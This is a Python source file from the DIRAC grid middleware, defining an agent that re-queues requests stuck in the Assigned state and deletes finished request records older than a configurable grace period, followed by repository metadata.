# Author: Krzysztof.Ciba@NOSPAMgmail.com
# Date: 2013/05/17 08:31:26
########################################################################
"""Cleaning the RequestDB from obsolete records and kicking assigned requests
.. literalinclude:: ../ConfigTemplate.cfg
:start-after: ##BEGIN CleanReqDBAgent
:end-before: ##END
:dedent: 2
:caption: CleanReqDBAgent options
.. moduleauthor:: Krzysztof.Ciba@NOSPAMgmail.com
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
__RCSID__ = "$Id$"
# #
# @file CleanReqDBAgent.py
# @author Krzysztof.Ciba@NOSPAMgmail.com
# @date 2013/05/17 08:32:08
# @brief Definition of CleanReqDBAgent class.
# # imports
import datetime
# # from DIRAC
from DIRAC import S_OK
from DIRAC.FrameworkSystem.Client.MonitoringClient import gMonitor
from DIRAC.Core.Base.AgentModule import AgentModule
from DIRAC.RequestManagementSystem.Client.ReqClient import ReqClient
from DIRAC.RequestManagementSystem.Client.Request import Request
AGENT_NAME = "RequestManagement/CleanReqDBAgent"
########################################################################
class CleanReqDBAgent(AgentModule):
"""
.. class:: CleanReqDBAgent
"""
# # DEL GRACE PERIOD in DAYS
DEL_GRACE_DAYS = 60
# # DEL LIMIT
DEL_LIMIT = 100
# # KICK PERIOD in HOURS
KICK_GRACE_HOURS = 1
# # KICK LIMIT
KICK_LIMIT = 10000
# # remove failed requests flag
DEL_FAILED = False
# # request client
__requestClient = None
def requestClient(self):
""" request client getter """
if not self.__requestClient:
self.__requestClient = ReqClient()
return self.__requestClient
def initialize(self):
""" initialization """
self.DEL_GRACE_DAYS = self.am_getOption("DeleteGraceDays", self.DEL_GRACE_DAYS)
self.log.info("Delete grace period = %s days" % self.DEL_GRACE_DAYS)
self.DEL_LIMIT = self.am_getOption("DeleteLimit", self.DEL_LIMIT)
self.log.info("Delete limit = %s request/cycle" % self.DEL_LIMIT)
self.DEL_FAILED = self.am_getOption("DeleteFailed", self.DEL_FAILED)
self.log.info("Delete failed requests: %s" % {True: "yes", False: "no"}[self.DEL_FAILED])
self.KICK_GRACE_HOURS = self.am_getOption("KickGraceHours", self.KICK_GRACE_HOURS)
self.log.info("Kick assigned requests period = %s hours" % self.KICK_GRACE_HOURS)
self.KICK_LIMIT = self.am_getOption("KickLimit", self.KICK_LIMIT)
self.log.info("Kick limit = %s request/cycle" % self.KICK_LIMIT)
# # gMonitor stuff
gMonitor.registerActivity("DeletedRequests", "Deleted finished requests",
"CleanReqDBAgent", "Requests/min", gMonitor.OP_SUM)
gMonitor.registerActivity("KickedRequests", "Assigned requests kicked",
"CleanReqDBAgent", "Requests/min", gMonitor.OP_SUM)
return S_OK()
def execute(self):
""" execution in one cycle """
now = datetime.datetime.utcnow()
kickTime = now - datetime.timedelta(hours=self.KICK_GRACE_HOURS)
rmTime = now - datetime.timedelta(days=self.DEL_GRACE_DAYS)
# # kick
statusList = ["Assigned"]
requestIDsList = self.requestClient().getRequestIDsList(statusList, self.KICK_LIMIT)
if not requestIDsList["OK"]:
self.log.error("execute: %s" % requestIDsList["Message"])
return requestIDsList
requestIDsList = requestIDsList["Value"]
kicked = 0
for requestID, status, lastUpdate in requestIDsList:
reqStatus = self.requestClient().getRequestStatus(requestID)
if not reqStatus['OK']:
self.log.error(("execute: unable to get request status", reqStatus['Message']))
continue
status = reqStatus['Value']
if lastUpdate < kickTime and status == 'Assigned':
getRequest = self.requestClient().peekRequest(requestID)
if not getRequest["OK"]:
self.log.error("execute: unable to read request '%s': %s" % (requestID, getRequest["Message"]))
continue
getRequest = getRequest["Value"]
if getRequest and getRequest.LastUpdate < kickTime:
self.log.info("execute: kick assigned request (%s/'%s') in status %s" % (requestID,
getRequest.RequestName,
getRequest.Status))
putRequest = self.requestClient().putRequest(getRequest)
if not putRequest["OK"]:
self.log.error("execute: unable to put request (%s/'%s'): %s" % (requestID,
getRequest.RequestName,
putRequest["Message"]))
continue
else:
self.log.verbose("Kicked request %d" % putRequest['Value'])
kicked += 1
# # delete
statusList = ["Done", "Failed", "Canceled"] if self.DEL_FAILED else ["Done"]
requestIDsList = self.requestClient().getRequestIDsList(statusList, self.DEL_LIMIT)
if not requestIDsList["OK"]:
self.log.error("execute: %s" % requestIDsList["Message"])
return requestIDsList
requestIDsList = requestIDsList["Value"]
deleted = 0
for requestID, status, lastUpdate in requestIDsList:
if lastUpdate < rmTime:
self.log.info("execute: deleting request '%s' with status %s" % (requestID, status))
delRequest = self.requestClient().deleteRequest(requestID)
if not delRequest["OK"]:
self.log.error("execute: unable to delete request '%s': %s" % (requestID, delRequest["Message"]))
continue
deleted += 1
gMonitor.addMark("KickedRequests", kicked)
gMonitor.addMark("DeletedRequests", deleted)
self.log.info("execute: kicked assigned requests = %s" % kicked)
self.log.info("execute: deleted finished requests = %s" % deleted)
return S_OK()
|
yujikato/DIRAC
|
src/DIRAC/RequestManagementSystem/Agent/CleanReqDBAgent.py
|
Python
|
gpl-3.0
| 6,076
|
[
"DIRAC"
] |
a1e6c553fd9fcecd7f5e253273f09000f28afa57c5ffcd83ec5c865d37c8ce3d
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.